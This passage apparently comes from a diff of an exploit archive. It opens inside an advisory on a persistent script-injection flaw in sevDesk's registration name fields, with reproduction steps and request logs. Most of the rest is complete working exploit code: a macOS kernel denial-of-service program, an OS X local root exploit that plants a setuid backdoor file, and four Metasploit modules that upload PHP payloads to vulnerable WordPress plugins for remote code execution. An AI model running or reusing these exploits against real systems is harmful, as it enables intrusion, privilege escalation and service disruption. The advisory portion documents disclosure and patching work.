the injected script code occurs on the application-side in the main dasboard module through the rightHead and feedcontent class. The attack
|
||||
vector is persistent and the request method to inject the code is POST. The victim user can also change the name by usage of the application
|
||||
which does not require an admins interaction on successful exploitation.
|
||||
|
||||
The security risk of the persistent script code inject web vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system)
|
||||
count of 5.9. Exploitation of the persistent vulnerability requires a low privileged sevdesk user account with restricted access and no direct
|
||||
user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects
|
||||
to malicious source and persistent manipulation of affected or connected application modules.
|
||||
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Registration to SevDesk
|
||||
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] surname
|
||||
[+] firstname
|
||||
[+] family name
|
||||
|
||||
Affected Module(s):
|
||||
[+] Dasboard Index - rightHead & feedcontent
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerability can be exploited by low privileged application user accounts with low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
Manual steps to reproduce the vulnerability
|
||||
|
||||
1. Register an account by usage of the following webpage https://my.sevdesk.de/register/
|
||||
2. Include to the surname, family name and firstname your own script code as payload
|
||||
3. Save the registration form and go to the website https://my.sevdesk.de/
|
||||
4. Login with the user account data
|
||||
5. The execution of the injected script code occurs after the registration POST method request and next to the redirect in the main dasboard index (rightHead < name > feedcontent)
|
||||
6. Successful reproduce of the application-side security vulnerability!
|
||||
|
||||
|
||||
PoC: rightHead > Displayname (First- & Lastname)
|
||||
|
||||
<div id="middleHead">
|
||||
<input id="suche" type="text" onfocus="this.value = ''" value="Gehe zu Kontakt, Projekt, Dokument..." />
|
||||
</div>
|
||||
<div id="rightHead">
|
||||
<div style="float:right;margin-top:5px;text-align: right;padding-right:5px;">
|
||||
<div style="color:#fff;padding:3px;margin-bottom:2px;">
|
||||
<span style="color:#f5d385;font-weight:bold;">a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"</span></div>
|
||||
<a href="/admin/company">Einstellungen</a> |
|
||||
<a href="http://portal.sevdesk.de/" target="_blank">Hilfe</a> | <a href="./auth/logout/">Logout</a>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div id="headNav" style="top:80px;">
|
||||
<div class="headwrapper">
|
||||
<ul id="mainNavigation">
|
||||
|
||||
|
||||
PoC: Verlauf > feedcontent
|
||||
|
||||
<div>
|
||||
<div class="feed" id_feed="393424"><div class="imgpos"><img src="/img/icons/24x24/offer.png"></div><div class="feedbody">
|
||||
<div class="headline">Samstag, 30. August 2014 - 02:14</div><div class="feedcontent">
|
||||
a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> hat den Status des
|
||||
<img src="/img/icons/16x16/offer.png"> <a href="/om/detail/index/id/60547">Angebots - 1007</a> auf
|
||||
"archiviert" geändert
|
||||
</div></div><div class="clearfix"></div></div>
|
||||
<div class="feed" id_feed="393423"><div class="imgpos"><img src="/img/icons/24x24/offer.png"/></div><div class="feedbody">
|
||||
<div class="headline">Samstag, 30. August 2014 - 02:14
|
||||
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] (Registration sevDesk) ---
|
||||
Status: 200[OK]
|
||||
POST https://my.sevdesk.de/register/save Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[94] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[my.sevdesk.de]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
|
||||
Accept[application/json, text/javascript, */*; q=0.01]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
X-Requested-With[XMLHttpRequest]
|
||||
Referer[https://my.sevdesk.de/register]
|
||||
Content-Length[119]
|
||||
Cookie[PHPSESSID=63m788aic41f173a01akttgp24; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1409658038644r0.9444753343384411;
|
||||
optimizelyBuckets=%7B%7D; __utma=47898149.1078820709.1409658041.1409658041.1409658041.1; __utmb=47898149.3.10.1409658041; __utmc=47898149;
|
||||
__utmz=47898149.1409658041.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); kvcd=1409658049586;
|
||||
km_ai=5La%2FUBeVvA7zRXwSTd4gSRBJccE%3D; km_uq=; km_vs=1; km_lv=1409658050; _ga=GA1.2.1078820709.1409658041]
|
||||
Connection[keep-alive]
|
||||
Pragma[no-cache]
|
||||
Cache-Control[no-cache]
|
||||
POST-Daten:
|
||||
name[[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]]
|
||||
surename[[PERSISTENT INJECTED SCRIPT CODE VIA SURNAME VALUE!]]
|
||||
familyname[[PERSISTENT INJECTED SCRIPT CODE VIA FAMILY NAME VALUE!]]
|
||||
username[support%40vulnerability-lab.com]
|
||||
password[chaos666]
|
||||
Response Header:
|
||||
Date[Tue, 02 Sep 2014 11:44:30 GMT]
|
||||
Server[Apache/2.2.22 (Debian)]
|
||||
X-Powered-By[PHP/5.4.4-14+deb7u7]
|
||||
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
||||
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
||||
Pragma[no-cache]
|
||||
Vary[Accept-Encoding]
|
||||
Content-Encoding[gzip]
|
||||
Content-Length[94]
|
||||
Keep-Alive[timeout=5, max=99]
|
||||
Connection[Keep-Alive]
|
||||
Content-Type[text/html; charset=utf-8]
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://my.sevdesk.de/register/save
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerbility can be patched by a secure parse and encode of the affected rightHead & feedcontent values in the dashboard application index.
|
||||
Filter and restrict the user registration input form with a secure mask or exception-handling to prevent persistent code injections in the important name values.
|
||||
|
||||
Note: The issue has been patched by the manufacturer since 2015-02-01
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent input validation web vulnerabilities in the main dasboard application is estimated as medium. (CVSS 5.9)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
80
platforms/osx/dos/36814.c
Executable file
80
platforms/osx/dos/36814.c
Executable file
|
@ -0,0 +1,80 @@
|
|||
/*
|
||||
* 2015, Maxime Villard, CVE-2015-1100
|
||||
* Local DoS caused by a missing limit check in the fat loader of the Mac OS X
|
||||
* Kernel.
|
||||
*
|
||||
* $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
|
||||
* $ ./Mac-OS-X_Fat-DoS BINARY-NAME
|
||||
*
|
||||
* Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
|
||||
* Analysis: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <fcntl.h>
|
||||
#include <spawn.h>
|
||||
#include <unistd.h>
|
||||
#include <err.h>
|
||||
#include <mach-o/fat.h>
|
||||
#include <sys/stat.h>
|
||||
|
||||
#define MAXNUM (4096)
|
||||
#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))
|
||||
|
||||
void CraftBinary(char *name)
|
||||
{
|
||||
struct fat_header fat_header;
|
||||
struct fat_arch *arches;
|
||||
size_t i;
|
||||
int fd;
|
||||
|
||||
memset(&fat_header, 0, sizeof(fat_header));
|
||||
fat_header.magic = FAT_MAGIC;
|
||||
fat_header.nfat_arch = 4096;
|
||||
|
||||
if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
|
||||
err(-1, "calloc");
|
||||
for (i = 0; i < MAXNUM0; i++)
|
||||
arches[i].cputype = CPU_TYPE_I386;
|
||||
|
||||
if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
|
||||
err(-1, "open");
|
||||
if (write(fd, &fat_header, sizeof(fat_header)) == -1)
|
||||
err(-1, "write");
|
||||
if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
|
||||
err(-1, "write");
|
||||
if (fchmod(fd, S_IXUSR) == -1)
|
||||
err(-1, "fchmod");
|
||||
close(fd);
|
||||
free(arches);
|
||||
}
|
||||
|
||||
void SpawnBinary(char *name)
|
||||
{
|
||||
cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
|
||||
char *argv[] = { "Crazy Horse", NULL };
|
||||
char *envp[] = { NULL };
|
||||
posix_spawnattr_t attr;
|
||||
size_t set = 0;
|
||||
int ret;
|
||||
|
||||
if (posix_spawnattr_init(&attr) == -1)
|
||||
err(-1, "posix_spawnattr_init");
|
||||
if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
|
||||
err(-1, "posix_spawnattr_setbinpref_np");
|
||||
fprintf(stderr, "----------- Goodbye! -----------\n");
|
||||
ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
|
||||
fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
if (argc != 2) {
|
||||
printf("Usage: %s BINARY-NAME\n", argv[0]);
|
||||
} else {
|
||||
CraftBinary(argv[1]);
|
||||
SpawnBinary(argv[1]);
|
||||
}
|
||||
}
|
128
platforms/osx/local/36739.m
Executable file
128
platforms/osx/local/36739.m
Executable file
|
@ -0,0 +1,128 @@
|
|||
/* osx-irony-assist.m
|
||||
*
|
||||
* Copyright (c) 2010 by <mu-b@digit-labs.org>
|
||||
*
|
||||
* Apple MACOS X < 10.9/10? local root exploit
|
||||
* by mu-b - June 2010
|
||||
*
|
||||
* - Tested on: Apple MACOS X <= 10.8.X
|
||||
*
|
||||
* $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
|
||||
*
|
||||
* The most ironic backdoor perhaps in the history of backdoors.
|
||||
* Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
|
||||
* uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
|
||||
* in a directory,
|
||||
*
|
||||
* drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db
|
||||
*
|
||||
* without being root, now how did you do that?
|
||||
*
|
||||
* Copy what you want, wherever you want it, with whatever permissions you
|
||||
* desire, hmmm, backdoor?
|
||||
*
|
||||
* This is now fixed, so I guess this is OK :-)
|
||||
*
|
||||
* - Private Source Code -DO NOT DISTRIBUTE -
|
||||
* http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#import <SecurityFoundation/SFAuthorization.h>
|
||||
#import <Foundation/Foundation.h>
|
||||
|
||||
/* where you want to write it! */
|
||||
#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"
|
||||
|
||||
int do_assistive_copy(const char *spath, const char *dpath)
|
||||
{
|
||||
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
|
||||
id authenticatorInstance, *userUtilsInstance;
|
||||
Class authenticatorClass, userUtilsClass;
|
||||
|
||||
(void) pool;
|
||||
NSBundle *adminBundle =
|
||||
[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
|
||||
|
||||
authenticatorClass = [adminBundle classNamed:@"Authenticator"];
|
||||
if (!authenticatorClass)
|
||||
{
|
||||
fprintf (stderr, "* failed locating the Authenticator Class\n");
|
||||
return (EXIT_FAILURE);
|
||||
}
|
||||
|
||||
printf ("* Found Authenticator Class!\n");
|
||||
authenticatorInstance =
|
||||
[authenticatorClass performSelector:@selector(sharedAuthenticator)];
|
||||
|
||||
userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
|
||||
if (!userUtilsClass)
|
||||
{
|
||||
fprintf (stderr, "* failed locating the UserUtilities Class\n");
|
||||
return (EXIT_FAILURE);
|
||||
}
|
||||
|
||||
printf ("* found UserUtilities Class!\n");
|
||||
userUtilsInstance = (id *) [userUtilsClass alloc];
|
||||
|
||||
SFAuthorization *authObj = [SFAuthorization authorization];
|
||||
OSStatus isAuthed = (OSStatus)
|
||||
[authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
|
||||
withObject:authObj];
|
||||
printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);
|
||||
|
||||
NSData *suidBin =
|
||||
[NSData dataWithContentsOfFile:[NSString stringWithCString:spath
|
||||
encoding:NSASCIIStringEncoding]];
|
||||
if (!suidBin)
|
||||
{
|
||||
fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
|
||||
return (EXIT_FAILURE);
|
||||
}
|
||||
|
||||
NSDictionary *createFileWithContentsDict =
|
||||
[NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
|
||||
forKey:(id)NSFilePosixPermissions];
|
||||
if (!createFileWithContentsDict)
|
||||
{
|
||||
fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
|
||||
return (EXIT_FAILURE);
|
||||
}
|
||||
|
||||
CFStringRef writePath =
|
||||
CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
|
||||
#pragma clang diagnostic push
|
||||
#pragma clang diagnostic ignored "-Wobjc-method-access"
|
||||
[*userUtilsInstance createFileWithContents:suidBin path:writePath
|
||||
attributes:createFileWithContentsDict];
|
||||
#pragma clang diagnostic pop
|
||||
printf ("* now execute suid backdoor at %s\n", dpath);
|
||||
|
||||
/* send the "Distributed Object Message" to the defaultCenter,
|
||||
* is this really necessary? (not for ownage)
|
||||
*/
|
||||
[[NSDistributedNotificationCenter defaultCenter]
|
||||
postNotificationName:@"com.apple.accessibility.api"
|
||||
object:@"system.preferences" userInfo:nil
|
||||
deliverImmediately:YES];
|
||||
|
||||
return (EXIT_SUCCESS);
|
||||
}
|
||||
|
||||
int main (int argc, const char * argv[])
|
||||
{
|
||||
|
||||
printf ("Apple MACOS X < 10.9/10? local root exploit\n"
|
||||
"by: <mu-b@digit-labs.org>\n"
|
||||
"http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");
|
||||
|
||||
if (argc <= 1)
|
||||
{
|
||||
fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
|
||||
exit (EXIT_SUCCESS);
|
||||
}
|
||||
|
||||
return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
|
||||
}
|
84
platforms/php/remote/36809.rb
Executable file
84
platforms/php/remote/36809.rb
Executable file
|
@ -0,0 +1,84 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::HTTP::Wordpress
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wordpress Reflex Gallery Upload Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery
|
||||
version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # Vulnerability discovery
|
||||
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '36374'],
|
||||
['OSVDB', '88853'],
|
||||
['WPVDB', '7867']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Reflex Gallery 3.1.3', {}]],
|
||||
'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date.
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
check_plugin_version_from_readme('reflex-gallery', '3.1.4')
|
||||
end
|
||||
|
||||
def exploit
|
||||
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
|
||||
post_data = data.to_s
|
||||
|
||||
time = Time.new
|
||||
year = time.year.to_s
|
||||
month = "%02d" % time.month
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
|
||||
'method' => 'POST',
|
||||
'vars_get' => {
|
||||
'Year' => "#{year}",
|
||||
'Month' => "#{month}"
|
||||
},
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
if res
|
||||
if res.code == 200 && res.body =~ /success|#{php_pagename}/
|
||||
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
|
||||
register_files_for_cleanup(php_pagename)
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
|
||||
end
|
||||
|
||||
print_status("#{peer} - Calling payload...")
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
|
||||
)
|
||||
end
|
||||
end
|
82
platforms/php/remote/36810.rb
Executable file
82
platforms/php/remote/36810.rb
Executable file
|
@ -0,0 +1,82 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::HTTP::Wordpress
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
|
||||
plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Claudio Viviani', # Vulnerability discovery
|
||||
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
|
||||
['WPVDB', '7896']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]],
|
||||
'DisclosureDate' => 'Apr 12 2015',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
|
||||
end
|
||||
|
||||
def exploit
|
||||
php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('upload', nil, nil, 'form-data; name="action"')
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
|
||||
data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
|
||||
post_data = data.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => wordpress_url_admin_ajax,
|
||||
'method' => 'POST',
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
if res
|
||||
if res.code == 200 && res.body =~ /filename/
|
||||
begin
|
||||
new_php_pagename = JSON.parse(res.body)["filename"]
|
||||
rescue JSON::ParserError
|
||||
fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename')
|
||||
end
|
||||
print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
|
||||
register_files_for_cleanup(new_php_pagename)
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unknown,'ERROR')
|
||||
end
|
||||
|
||||
print_status("#{peer} - Calling payload...")
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
|
||||
)
|
||||
end
|
||||
end
|
76
platforms/php/remote/36811.rb
Executable file
76
platforms/php/remote/36811.rb
Executable file
|
@ -0,0 +1,76 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::HTTP::Wordpress
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wordpress Creative Contact Form Upload Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
|
||||
Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Gianni Angelozzi', # Vulnerability discovery
|
||||
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '35057'],
|
||||
['OSVDB', '113669'],
|
||||
['WPVDB', '7652']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Creative Contact Form 0.9.7', {}]],
|
||||
'DisclosureDate' => 'Oct 22 2014',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
|
||||
end
|
||||
|
||||
def exploit
|
||||
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
|
||||
post_data = data.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
|
||||
'method' => 'POST',
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
if res
|
||||
if res.code == 200 && res.body =~ /files|#{php_pagename}/
|
||||
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
|
||||
register_files_for_cleanup(php_pagename)
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unknown, 'ERROR')
|
||||
end
|
||||
|
||||
print_status("#{peer} - Calling payload...")
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
|
||||
)
|
||||
end
|
||||
end
|
79
platforms/php/remote/36812.rb
Executable file
79
platforms/php/remote/36812.rb
Executable file
|
@ -0,0 +1,79 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::HTTP::Wordpress
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wordpress Work The Flow Upload Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,
|
||||
version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Claudio Viviani', # Vulnerability discovery
|
||||
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['WPVDB', '7883'],
|
||||
['EDB', '36640'],
|
||||
['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Work The Flow 2.5.2', {}]],
|
||||
'DisclosureDate' => 'Mar 14 2015',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.4')
|
||||
end
|
||||
|
||||
def exploit
|
||||
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('upload', nil, nil, 'form-data; name="action"')
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
|
||||
post_data = data.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
|
||||
'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
|
||||
'method' => 'POST',
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
if res
|
||||
if res.code == 200
|
||||
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
|
||||
register_files_for_cleanup(php_pagename)
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unknown, 'ERROR')
|
||||
end
|
||||
|
||||
print_status("#{peer} - Calling payload...")
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
|
||||
'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
|
||||
)
|
||||
end
|
||||
end
|
31
platforms/php/webapps/36774.txt
Executable file
31
platforms/php/webapps/36774.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
|
||||
# Vendor :Miwisoft LLC
|
||||
# Vendor Homepage :http://www.miwisoft.com
|
